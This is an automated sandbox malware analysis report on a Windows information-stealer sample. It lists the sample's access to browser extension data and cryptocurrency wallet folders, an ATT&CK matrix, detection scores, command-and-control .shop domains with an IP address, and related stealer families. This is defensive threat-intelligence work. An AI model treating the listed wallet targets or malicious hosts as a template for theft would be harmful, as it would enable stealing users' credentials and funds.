            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWYJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeDirectory queried: C:\Users\user\Documents\NHPKIZUUSGJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWYJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeDirectory queried: C:\Users\user\Documents\NHPKIZUUSGJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
            Source: Yara matchFile source: Process Memory Space: 20qMFnd9tO.exe PID: 7556, type: MEMORYSTR

Remote Access Functionality

Source: Yara match, File source: sslproxydump.pcap, type: PCAP
Source: Yara match, File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: 20qMFnd9tO.exe PID: 7556, type: MEMORYSTR
ATT&CK matrix (one line per tactic; techniques that carry a bracketed number are the ones the report flagged, with the count the matrix shows):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: [1] Windows Management Instrumentation; [1] PowerShell; At; Cron; Launchd; Scheduled Task
Persistence: [1] DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: [1] Process Injection; [1] DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: [11] Virtualization/Sandbox Evasion; [1] Process Injection; [11] Deobfuscate/Decode Files or Information; [3] Obfuscated Files or Information; [2] Software Packing; [1] DLL Side-Loading
Credential Access: [1] OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: [121] Security Software Discovery; [11] Virtualization/Sandbox Evasion; [2] Process Discovery; [1] File and Directory Discovery; [12] System Information Discovery; Wi-Fi Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: [1] Screen Capture; [1] Archive Collected Data; [31] Data from Local System; [2] Clipboard Data; Keylogging; GUI Input Capture
Command and Control: [21] Encrypted Channel; [2] Non-Application Layer Protocol; [113] Application Layer Protocol; Protocol Impersonation; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Source | Detection | Scanner | Label
20qMFnd9tO.exe | 39% | ReversingLabs |
20qMFnd9tO.exe | 39% | Virustotal |
20qMFnd9tO.exe | 100% | Avira | HEUR/AGEN.1316639
20qMFnd9tO.exe | 100% | Joe Sandbox ML |

No Antivirus matches

Source | Detection | Scanner | Label
wagonglidemonkywo.shop | 1% | Virustotal |

Source | Detection | Scanner | Label
http://crl.rootca1.amazontrust.com/rootca1.crl0 | 0% | URL Reputation | safe
http://x1.c.lencr.org/0 | 0% | URL Reputation | safe
http://x1.i.lencr.org/0 | 0% | URL Reputation | safe
http://crt.rootca1.amazontrust.com/rootca1.cer0? | 0% | URL Reputation | safe
https://wagonglidemonkywo.shop:443/api | 100% | Avira URL Cloud | malware
https://wagonglidemonkywo.shop/j | 0% | Avira URL Cloud | safe
https://wagonglidemonkywo.shop/ | 0% | Avira URL Cloud | safe
pillowbrocccolipe.shop | 0% | Avira URL Cloud | safe
communicationgenerwo.shop | 0% | Avira URL Cloud | safe
https://wagonglidemonkywo.shop/api2 | 0% | Avira URL Cloud | safe
http://ocsp.rootca1.amazontrust.com0: | 0% | Avira URL Cloud | safe
https://wagonglidemonkywo.shop/C | 0% | Avira URL Cloud | safe
https://wagonglidemonkywo.shop:443/api | 10% | Virustotal |
https://wagonglidemonkywo.shop/ | 1% | Virustotal |
pillowbrocccolipe.shop | 2% | Virustotal |
https://wagonglidemonkywo.shop/A | 0% | Avira URL Cloud | safe
https://wagonglidemonkywo.shop/8 | 0% | Avira URL Cloud | safe
enthusiasimtitleow.shop | 0% | Avira URL Cloud | safe
https://wagonglidemonkywo.shop/S | 0% | Avira URL Cloud | safe
https://wagonglidemonkywo.shop/api | 100% | Avira URL Cloud | malware
https://wagonglidemonkywo.shop/apiy | 0% | Avira URL Cloud | safe
communicationgenerwo.shop | 2% | Virustotal |
wagonglidemonkywo.shop | 0% | Avira URL Cloud | safe
https://wagonglidemonkywo.shop/api | 10% | Virustotal |
worryfillvolcawoi.shop | 0% | Avira URL Cloud | safe
enthusiasimtitleow.shop | 2% | Virustotal |
https://support.microsof | 0% | Avira URL Cloud | safe
dismissalcylinderhostw.shop | 0% | Avira URL Cloud | safe
diskretainvigorousiw.shop | 0% | Avira URL Cloud | safe
https://wagonglidemonkywo.shop/$ | 0% | Avira URL Cloud | safe
https://wagonglidemonkywo.shop/apiM | 0% | Avira URL Cloud | safe
worryfillvolcawoi.shop | 2% | Virustotal |
https://wagonglidemonkywo.shop/d | 0% | Avira URL Cloud | safe
cleartotalfisherwo.shop | 0% | Avira URL Cloud | safe
affordcharmcropwo.shop | 0% | Avira URL Cloud | safe
https://wagonglidemonkywo.shop/apiyi | 0% | Avira URL Cloud | safe
https://wagonglidemonkywo.shop/apiH | 0% | Avira URL Cloud | safe
affordcharmcropwo.shop | 2% | Virustotal |
cleartotalfisherwo.shop | 2% | Virustotal |
wagonglidemonkywo.shop | 1% | Virustotal |
dismissalcylinderhostw.shop | 2% | Virustotal |
diskretainvigorousiw.shop | 2% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
wagonglidemonkywo.shop | 172.67.221.128 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
communicationgenerwo.shop | true | 2%, Virustotal; Avira URL Cloud: safe | unknown
pillowbrocccolipe.shop | true | 2%, Virustotal; Avira URL Cloud: safe | unknown
enthusiasimtitleow.shop | true | 2%, Virustotal; Avira URL Cloud: safe | unknown
https://wagonglidemonkywo.shop/api | false | 10%, Virustotal; Avira URL Cloud: malware | unknown
wagonglidemonkywo.shop | true | 1%, Virustotal; Avira URL Cloud: safe | unknown
worryfillvolcawoi.shop | true | 2%, Virustotal; Avira URL Cloud: safe | unknown
dismissalcylinderhostw.shop | true | 2%, Virustotal; Avira URL Cloud: safe | unknown
diskretainvigorousiw.shop | true | 2%, Virustotal; Avira URL Cloud: safe | unknown
cleartotalfisherwo.shop | true | 2%, Virustotal; Avira URL Cloud: safe | unknown
affordcharmcropwo.shop | true | 2%, Virustotal; Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | 20qMFnd9tO.exe, 00000000.00000003.1632292229.0000000002DB7000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | 20qMFnd9tO.exe, 00000000.00000003.1632292229.0000000002DB7000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://wagonglidemonkywo.shop:443/api | 20qMFnd9tO.exe, 00000000.00000003.1704561901.0000000000824000.00000004.00000020.00020000.00000000.sdmp | false | 10%, Virustotal; Avira URL Cloud: malware | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 20qMFnd9tO.exe, 00000000.00000003.1632292229.0000000002DB7000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://wagonglidemonkywo.shop/j | 20qMFnd9tO.exe, 00000000.00000003.1670714016.0000000002D7E000.00000004.00000800.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000003.1655773543.0000000002D7B000.00000004.00000800.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000003.1670305521.0000000002D7D000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://wagonglidemonkywo.shop/ | 20qMFnd9tO.exe, 00000000.00000002.1815250772.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000003.1647929936.0000000002D7B000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal; Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 20qMFnd9tO.exe, 00000000.00000003.1632292229.0000000002DB7000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://wagonglidemonkywo.shop/api2 | 20qMFnd9tO.exe, 00000000.00000003.1631671750.0000000000839000.00000004.00000020.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000003.1631574292.0000000000837000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0 | 20qMFnd9tO.exe, 00000000.00000003.1648424099.0000000002D95000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://upx.sf.net | Amcache.hve.3.dr | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 20qMFnd9tO.exe, 00000000.00000003.1632292229.0000000002DB7000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ocsp.rootca1.amazontrust.com0: | 20qMFnd9tO.exe, 00000000.00000003.1648424099.0000000002D95000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | 20qMFnd9tO.exe, 00000000.00000003.1631970037.0000000002DCC000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://wagonglidemonkywo.shop/C | 20qMFnd9tO.exe, 00000000.00000002.1815250772.0000000002D70000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 | 20qMFnd9tO.exe, 00000000.00000003.1631970037.0000000002DCC000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://wagonglidemonkywo.shop/A | 20qMFnd9tO.exe, 00000000.00000003.1670761878.0000000002DE2000.00000004.00000800.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000003.1670659108.0000000002DDF000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://wagonglidemonkywo.shop/8 | 20qMFnd9tO.exe, 00000000.00000002.1815250772.0000000002D70000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | 20qMFnd9tO.exe, 00000000.00000003.1632292229.0000000002DB7000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | 20qMFnd9tO.exe, 00000000.00000003.1649225538.0000000002E9B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ac.ecosia.org/autocomplete?q= | 20qMFnd9tO.exe, 00000000.00000003.1632292229.0000000002DB7000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://wagonglidemonkywo.shop/S | 20qMFnd9tO.exe, 00000000.00000003.1631574292.0000000000858000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://wagonglidemonkywo.shop/apiy | 20qMFnd9tO.exe, 00000000.00000002.1815250772.0000000002D70000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://x1.c.lencr.org/0 | 20qMFnd9tO.exe, 00000000.00000003.1648424099.0000000002D95000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://x1.i.lencr.org/0 | 20qMFnd9tO.exe, 00000000.00000003.1648424099.0000000002D95000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 20qMFnd9tO.exe, 00000000.00000003.1632292229.0000000002DB7000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.microsof | 20qMFnd9tO.exe, 00000000.00000003.1631970037.0000000002DCE000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0? | 20qMFnd9tO.exe, 00000000.00000003.1648424099.0000000002D95000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://wagonglidemonkywo.shop/$ | 20qMFnd9tO.exe, 00000000.00000003.1647929936.0000000002D7B000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://wagonglidemonkywo.shop/apiM | 20qMFnd9tO.exe, 00000000.00000003.1704602075.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000002.1815288069.0000000002D8F000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://wagonglidemonkywo.shop/d | 20qMFnd9tO.exe, 00000000.00000002.1815250772.0000000002D70000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://wagonglidemonkywo.shop/c | 20qMFnd9tO.exe, 00000000.00000003.1655773543.0000000002D7B000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://wagonglidemonkywo.shop/a | 20qMFnd9tO.exe, 00000000.00000003.1670168050.0000000002DDF000.00000004.00000800.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000003.1670293622.0000000002DE2000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://support.mozilla.org/products/firefoxgro.all | 20qMFnd9tO.exe, 00000000.00000003.1649225538.0000000002E9B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 20qMFnd9tO.exe, 00000000.00000003.1632292229.0000000002DB7000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://wagonglidemonkywo.shop/apiyi | 20qMFnd9tO.exe, 00000000.00000002.1815250772.0000000002D70000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://wagonglidemonkywo.shop/apiH | 20qMFnd9tO.exe, 00000000.00000003.1704602075.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000002.1815288069.0000000002D8F000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.221.128 | wagonglidemonkywo.shop | United States | 13335 | CLOUDFLARENETUS | true
                                            Joe Sandbox version:40.0.0 Tourmaline
                                            Analysis ID:1417393
                                            Start date and time:2024-03-29 08:10:06 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 4m 59s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:8
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:20qMFnd9tO.exe
                                            renamed because original name is a hash value
                                            Original Sample Name:0f4a71f80cd80f172817f116318e3fca.exe
                                            Detection:MAL
                                            Classification:mal100.troj.spyw.evad.winEXE@2/5@1/1
                                            EGA Information:
                                            • Successful, ratio: 100%
                                            HCA Information:
                                            • Successful, ratio: 93%
                                            • Number of executed functions: 45
                                            • Number of non-executed functions: 178
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                            • Excluded IPs from analysis (whitelisted): 52.182.143.212, 20.42.65.92
                                            • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                            • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                             • Not all processes were analyzed, report is missing behavior information
                                            • Report size getting too big, too many NtCreateFile calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                             Time | Type | Description
                                             08:10:52 | API Interceptor | 7x Sleep call for process: 20qMFnd9tO.exe modified
                                             08:11:10 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
                                            No context
                                            No context
                                             Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                             CLOUDFLARENETUS | 88Oj06xDol.exe | Get hash | malicious | RisePro Stealer | Browse | 104.26.5.15
                                             CLOUDFLARENETUS | SecuriteInfo.com.Win32.PWSX-gen.9732.1319.exe | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | 104.26.12.205
                                             CLOUDFLARENETUS | SecuriteInfo.com.FileRepMalware.14270.3068.exe | Get hash | malicious | Unknown | Browse | 162.159.135.233
                                             CLOUDFLARENETUS | SecuriteInfo.com.FileRepMalware.14270.3068.exe | Get hash | malicious | Unknown | Browse | 162.159.133.233
                                             CLOUDFLARENETUS | https://1drv.ms/f/s!AsWd4BQz7qwJa8oeifBH2QA-eNg | Get hash | malicious | HTMLPhisher | Browse | 172.67.131.219
                                             CLOUDFLARENETUS | https://jpn104.z23.web.core.windows.net/werrx01USAHTML/?bcda=(0101)-88868-22952 | Get hash | malicious | TechSupportScam | Browse | 172.67.208.186
                                             CLOUDFLARENETUS | https://jpn104.z23.web.core.windows.net/werrx01USAHTML/?bcda=(0101)-88868-24980 | Get hash | malicious | TechSupportScam | Browse | 104.21.53.38
                                             CLOUDFLARENETUS | https://jpn104-secondary.z23.web.core.windows.net/werrx01USAHTML/?bcda=(0101)-88868-25074 | Get hash | malicious | TechSupportScam | Browse | 104.21.53.38
                                             CLOUDFLARENETUS | https://jpn104-secondary.z23.web.core.windows.net/werrx01USAHTML/?bcda=(0101)-88868-24910 | Get hash | malicious | TechSupportScam | Browse | 172.67.208.186
                                             CLOUDFLARENETUS | https://depl.pages.dev/ | Get hash | malicious | HTMLPhisher | Browse | 162.247.243.29
                                             Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                             a0e9f5d64349fb13191bc781f81f42e1 | 88Oj06xDol.exe | Get hash | malicious | RisePro Stealer | Browse | 172.67.221.128
                                             a0e9f5d64349fb13191bc781f81f42e1 | uQeIMs91Vh.exe | Get hash | malicious | Amadey, PureLog Stealer, RedLine, RisePro Stealer, zgRAT | Browse | 172.67.221.128
                                             a0e9f5d64349fb13191bc781f81f42e1 | Zam#U00f3wienie_27900045542300.CMD.cmd | Get hash | malicious | DBatLoader, Remcos | Browse | 172.67.221.128
                                             a0e9f5d64349fb13191bc781f81f42e1 | jUlAlD6KHz.exe | Get hash | malicious | RisePro Stealer | Browse | 172.67.221.128
                                             a0e9f5d64349fb13191bc781f81f42e1 | Document 20240327_1188908_1188909.bat | Get hash | malicious | Remcos, DBatLoader | Browse | 172.67.221.128
                                             a0e9f5d64349fb13191bc781f81f42e1 | Iv88OQbqpE.exe | Get hash | malicious | RisePro Stealer | Browse | 172.67.221.128
                                             a0e9f5d64349fb13191bc781f81f42e1 | file.exe | Get hash | malicious | RisePro Stealer | Browse | 172.67.221.128
                                             a0e9f5d64349fb13191bc781f81f42e1 | BuThoFHNNK.exe | Get hash | malicious | LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader | Browse | 172.67.221.128
                                             a0e9f5d64349fb13191bc781f81f42e1 | 6uVlPQSJ4e.exe | Get hash | malicious | LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader | Browse | 172.67.221.128
                                             a0e9f5d64349fb13191bc781f81f42e1 | 892016_Past Invoice_03_26_2024_48118858_756483.wsf | Get hash | malicious | Unknown | Browse | 172.67.221.128
                                            No context
                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):65536
                                            Entropy (8bit):0.9924166783473398
                                            Encrypted:false
                                            SSDEEP:384:MY8shNJzvWXwKo49DoEdjlzuiFPY4IO8nzj:MSM3o491jlzuiFPY4IO8
                                            MD5:7B6AD3B21D58B8F3039B1D91179246D3
                                            SHA1:8B6344A05586022DE744A6D194B27634A4FD7944
                                            SHA-256:83ADC4660FE534271CF4E28FBCABF9F6B8FFFDDA2F9BF1F48BA13914BFCE49D6
                                            SHA-512:981D8E265C96C6C85CAC5F9B8CB444B099077A20E149436F8BE987B034AB0DB331799CB483E61894526F568789558958FE0929C2EF5D2F4801A245F9791D7486
                                            Malicious:false
                                            Reputation:low
                                             Preview:Version=1 EventType=APPCRASH EventTime=133561698601706118 ReportType=2 Consent=1 UploadTime=133561698605924825 ReportStatus=655456 ReportIdentifier=39bd28e0-c81e-42b0-9cd8-4a3d051f6be2 IntegratorReportIdentifier=e41c3346-626d-4fc8-860c-48c80ec0cc2e Wow64Host=34404 Wow64Guest=332 NsAppName=20qMFnd9tO.exe AppSessionGuid=00001d84-0001-0014-aeae-0c3ba881da01 TargetAppId=W:00065e2a298f0395194f150f0ffa8a84fbc00000ffff!0000cf0d014f19140c6fb86beeeb078cc3cc9fe99a77!20qMFnd9tO.exe TargetApp
                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                            File Type:Mini DuMP crash report, 15 streams, Fri Mar 29 07:11:00 2024, 0x1205a4 type
                                            Category:dropped
                                            Size (bytes):48266
                                            Entropy (8bit):2.7196067945736297
                                            Encrypted:false
                                            SSDEEP:192:sJGqqXfHVF4qhfODBILsYnFlFdQ18m/bS1KYrMi/8I25os0oQ11:AGHbtWDBILvnFlFdCR7i/z2O7/7
                                            MD5:09C2A89E1886E53FD568DEBF7FC4D80F
                                            SHA1:4CCDB54CF5057B735C5CADF3055CFB40E1FDB5AE
                                            SHA-256:C19931CCEC92B348B1E7FCB6609F798C5B20B8D38CD7CE2ED636F08114BFB1D0
                                            SHA-512:BED119A26EB27D647B4AA48109F6916590C9EC7B29323ABBDC5ED3528170E197BA33FEDE9A48A7CC0DD8FDCC870F605EBC018F6CB8F75CF73DC208E3C57DBA2C
                                            Malicious:false
                                            Reputation:low
                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):8318
                                            Entropy (8bit):3.6956557139052757
                                            Encrypted:false
                                            SSDEEP:192:R6l7wVeJ/AD6M6Y9GSUFygmftaA5hoVpDT89bB8sf0rm:R6lXJ/E6M6YcSUFygmftaA5qEBPfV
                                            MD5:6C71A4641AFA9D9422D6D81CDEAE2AEE
                                            SHA1:955D58DD76BEEB596E3B85F4046618EF10FF3A4E
                                            SHA-256:CF85A1FCB3C10CE4750BB91A4D65494E93AB44BCF0B0427C5BE139215CECFE83
                                            SHA-512:D099937AD58DEAC559569C5980641AF572B4768AED5A2E8D1ADBFB7E77B12D5A95252EA3EEFE31B1D43A67CAFBD6B99EF81C0E74886C5CDFCC301AB7ADAA8E59
                                            Malicious:false
                                            Reputation:low
                                             Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>7556</Pi
                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):4579
                                            Entropy (8bit):4.44852050202713
                                            Encrypted:false
                                            SSDEEP:48:cvIwWl8zsvJg77aI9fsWpW8VYPYm8M4JTlF4h+q82P0jRfTC3d:uIjfRI7RF7VbJch/0VfTC3d
                                            MD5:474D862B93CD9EB3C585883FF4C90F5B
                                            SHA1:8744A591FE35A31270FB825AC7E99DE1643502F6
                                            SHA-256:C978552D370FE6A13189229E85A5AFDF812830054C8E4AC39CF6478ED814EA10
                                            SHA-512:475B752091CF3C54C8D2EBCCE327E844DDC8746C59C01A8E3DBB61ABAD9FD46F190A5CB98CF09AE88BDCEF7BD8D31BF81A45454EDFB6E43676AA3022274FFB96
                                            Malicious:false
                                            Reputation:low
